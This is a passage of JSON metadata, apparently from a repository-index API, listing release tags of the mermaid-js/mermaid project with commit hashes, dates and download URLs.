,"sha":"e0d16dcb22333f967e172e1f5b78af4baf6c0eff","kind":"commit","published_at":"2020-01-11T09:07:41.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/untagged-f43366252632a1a42020","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/untagged-f43366252632a1a42020","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@untagged-f43366252632a1a42020","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-f43366252632a1a42020","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-f43366252632a1a42020/manifests"},{"name":"8.4.4","sha":"0544dbe89196f2709ad714432ed4f6c9883fa023","kind":"commit","published_at":"2019-12-14T08:27:38.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.4.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.4/manifests"},{"name":"8.4.3","sha":"cb07a729e5e11d58ee1bce43dc041b76a610bde2","kind":"commit","published_at":"2019-11-30T23:42:41.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.4.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.3/manifests"},{"name":"8.4.2","sha":"1ecf0f4c234a773c735dc56804233a66377db3b3","kind":"commit","published_at":"2019-11-07T20:16:43.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.4.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.2/manifests"},{"name":"8.4.1","sha":"a3017b8456cfafb446aedb9ad549328a69e24984","kind":"commit","published_at":"2019-11-06T18:52:10.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.4.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.1/manifests"},{"name":"8.4.0","sha":"0157f665a305b0616e7932360a2f9fb2fa154668","kind":"commit","published_at":"2019-10-19T14:59:04.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.4.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.0/manifests"},{"name":"8.3.0","sha":"0200fef389e3b0988557028d6edd03262ceeefba","kind":"commit","published_at":"2019-09-19T05:19:48.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.3.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.3.0/manifests"},{"name":"8.2.6","sha":"2cb54293f80af8c07bee8b91cfb04388e786fb83","kind":"commit","published_at":"2019-09-01T09:18:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.2.6","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.6/manifests"},{"name":"8.2.5","sha":"34d3b852271ea3b7ebf58553334ad3d5645c15f1","kind":"commit","published_at":"2019-08-26T18:23:54.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.2.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.5/manifests"},{"name":"8.2.4","sha":"a3142aad69167bc6b690e5a77550a869c86d79cd","kind":"commit","published_at":"2019-08-20T18:07:12.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.2.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.4/manifests"},{"name":"8.2.3","sha":"5b85fe9293493bc68d105cf78192ac475c9c6d0e","kind":"commit","published_at":"2019-07-25T19:00:57.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.2.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.3/manifests"},{"name":"8.2.2","sha":"cf686c445c069bd3137560f2ab3a30bfb7bc9dc5","kind":"commit","published_at":"2019-07-22T12:23:03.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.2.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.2/manifests"},{"name":"8.2.1","sha":"5dd392127f1121dea2a05fb0a535101c085496b2","kind":"commit","published_at":"2019-07-21T09:23:23.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.2.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.1/manifests"},{"name":"8.2.0","sha":"92ac7d7c2477071a7279927b023872d866571e28","kind":"commit","published_at":"2019-07-17T16:14:22.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.2.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.0/manifests"},{"name":"8.1.0","sha":"95967151ae61be7db104564dbf29db81a4415f11","kind":"commit","published_at":"2019-06-25T08:24:57.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.1.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.1.0/manifests"},{"name":"7.0.5","sha":"f6b5c704e8939db0047e7a70ab3b6109af261fb0","kind":"commit","published_at":"2017-09-01T10:34:10.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/7.0.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/7.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@7.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.5/manifests"},{"name":"7.0.3","sha":"1076d671374898a1e75b778911832da01f57b88f","kind":"commit","published_at":"2017-06-04T04:13:22.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/7.0.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/7.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@7.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.3/manifests"},{"name":"7.0.2","sha":"5f5c8a2df00d93d2a9ed48fa868d1a4ded761457","kind":"commit","published_at":"2017-06-01T05:38:08.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/7.0.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/7.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@7.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.2/manifests"},{"name":"7.0.0","sha":"fb70b9742a22f8673cdd3a8d74fcbbc6ea03b432","kind":"commit","published_at":"2017-01-29T11:14:02.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/7.0.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/7.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@7.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.0/manifests"},{"name":"6.0.0","sha":"b8d3b01f64f30fa1dd46f7de160e8f80147010f3","kind":"commit","published_at":"2016-05-29T17:25:02.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/6.0.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/6.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@6.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/6.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/6.0.0/manifests"},{"name":"0.5.8","sha":"6ee298dc7d5913ea065b92e736184edcc05b6c74","kind":"commit","published_at":"2016-01-27T14:02:41.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.8","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.5.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.8/manifests"},{"name":"0.5.7","sha":"f005c72669c0e41bac6f42f81a6805a923dacbf0","kind":"commit","published_at":"2016-01-25T17:59:03.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.7","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.7/manifests"},{"name":"0.5.6","sha":"425a83c0da996ba565c2b840993fbf61a725a84a","kind":"commit","published_at":"2015-11-22T17:55:37.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.6","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.6/manifests"},{"name":"0.5.5","sha":"c9d29c16e20783700701a340540959ed5680236c","kind":"commit","published_at":"2015-10-21T19:14:41.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.5/manifests"},{"name":"0.5.4","sha":"ecb12ae2a8bc7f8c7077737713cf94acffac5c41","kind":"commit","published_at":"2015-10-19T20:08:17.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.4/manifests"},{"name":"0.5.3","sha":"16906ee242fcaf51d77f082fc3e7167241432ab0","kind":"commit","published_at":"2015-10-04T21:28:37.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.3/manifests"},{"name":"0.5.2","sha":"a611ff3abd70103fc9ac44af63103e9f9d5991c9","kind":"commit","published_at":"2015-10-04T21:09:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.2/manifests"},{"name":"0.5.1","sha":"0dc983d04ab9400e604a460eea3a409570961ab2","kind":"commit","published_at":"2015-06-21T15:26:19.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.1/manifests"},{"name":"0.5.0","sha":"999430f9e0c18ca830f497817c8701cfbd2046f9","kind":"commit","published_at":"2015-06-07T15:05:57.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.0/manifests"},{"name":"0.4.0","sha":"cc1a4be15a5ed3726a121a5fce75a561ddca5e1d","kind":"commit","published_at":"2015-03-01T15:48:16.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.4.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.4.0/manifests"},{"name":"0.3.5","sha":"2512666f493e8455f6534f216d42f00a7c9e526f","kind":"commit","published_at":"2015-02-15T18:34:18.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.3.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.5/manifests"},{"name":"0.3.4","sha":"074a819ca8d3d98cdef3144d091a63f919d3a55d","kind":"commit","published_at":"2015-02-15T17:11:46.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.3.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.4/manifests"},{"name":"0.3.3","sha":"5452be9feda681abb48d6364fbca662c6af0215d","kind":"commit","published_at":"2015-01-25T15:41:43.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.3.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.3/manifests"},{"name":"0.3.2","sha":"911cd09dd875deb50f65a98baf21f65ab2cbf82b","kind":"commit","published_at":"2015-01-11T14:02:35.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.3.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.2/manifests"},{"name":"0.3.1","sha":"222a6e06827f194d9368d3a790dbe6cc53341788","kind":"commit","published_at":"2015-01-05T14:32:39.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.3.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.1/manifests"},{"name":"0.3.0","sha":"c50178c640a4f6c99539bcc64cf029e94263fdb4","kind":"commit","published_at":"2014-12-22T12:52:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.3.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.0/manifests"},{"name":"0.2.16","sha":"5712c6de7bdca29a2950df1e6e0342ca8f0323a4","kind":"commit","published_at":"2014-12-15T18:35:09.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.16","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.16/manifests"},{"name":"0.2.15","sha":"6988dea3535919faa599537c31c5d94a01a30479","kind":"commit","published_at":"2014-12-05T09:50:47.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.15","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.15/manifests"},{"name":"0.2.14","sha":"dd26960852b4cba1d60e6bb2e508c0af6dd3d4b4","kind":"commit","published_at":"2014-12-03T18:35:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.14","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.14/manifests"},{"name":"0.2.13","sha":"fe2f3b403d1310c2a6e09aac24d0fdd257c2ddcf","kind":"commit","published_at":"2014-12-03T18:29:44.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.13","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.13/manifests"},{"name":"0.2.10","sha":"15023461722117d1429bbc0eb6030ca35aa51d53","kind":"commit","published_at":"2014-12-01T20:12:14.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.10","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.10/manifests"},{"name":"0.2.9","sha":"1a7997cdef01882ea7b46948d58625e904a09094","kind":"tag","published_at":"2014-12-01T20:04:35.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.9","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.9/manifests"},{"name":"0.2.8","sha":"1d2327c4c2ae60692f9bfe8b4d19ea195ebcbb04","kind":"tag","published_at":"2014-12-01T09:01:06.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.8","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.8/manifests"},{"name":"0.2.7","sha":"cbd41dbb1b4875aa3254babca694844908a1ecf7","kind":"tag","published_at":"2014-12-01T08:30:27.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.7","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.7/manifests"},{"name":"0.2.6","sha":"9a35844731426e1f74f64d272ae6398f20424457","kind":"commit","published_at":"2014-11-27T20:28:04.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.6","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.6/manifests"},{"name":"0.2.5","sha":"18be0e02aa80dcad171b26d2e397750100dc7d23","kind":"commit","published_at":"2014-11-27T20:16:17.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.5","tag_url":"https://repos.ecosyste.ms/ap